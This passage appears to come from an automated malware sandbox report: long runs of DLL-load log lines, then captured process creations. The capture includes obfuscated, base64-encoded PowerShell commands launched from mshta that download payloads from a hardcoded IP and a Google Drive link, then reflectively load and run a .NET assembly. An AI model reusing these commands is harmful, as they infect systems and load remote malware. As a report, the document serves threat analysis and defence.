              Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\explorer.exeSection loaded: aepic.dll
              Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
              Source: C:\Windows\explorer.exeSection loaded: userenv.dll
              Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
              Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\explorer.exeSection loaded: wininet.dll
              Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
              Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
              Source: C:\Windows\explorer.exeSection loaded: wldp.dll
              Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
              Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
              Source: C:\Windows\explorer.exeSection loaded: netutils.dll
              Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
              Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\explorer.exeSection loaded: aepic.dll
              Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
              Source: C:\Windows\explorer.exeSection loaded: userenv.dll
              Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
              Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\explorer.exeSection loaded: wininet.dll
              Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
              Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
              Source: C:\Windows\explorer.exeSection loaded: wldp.dll
              Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
              Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
              Source: C:\Windows\explorer.exeSection loaded: netutils.dll
              Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
              Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
              Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1330054592.0000000007610000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1749720181.0000000007210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700046832.00000000046AA000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1330430112.0000000007691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: aspnet_regbrowsers.pdb source: wihaduv, 00000011.00000000.1938334004.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, wihaduv.14.dr
              Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1749720181.0000000007210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700046832.00000000046AA000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: aspnet_regbrowsers.pdbl source: wihaduv, 00000011.00000000.1938334004.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, wihaduv.14.dr
              Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1749720181.0000000007210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700046832.00000000046AA000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: q6C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.pdb source: powershell.exe, 00000001.00000002.1442591521.0000000004D6E000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; 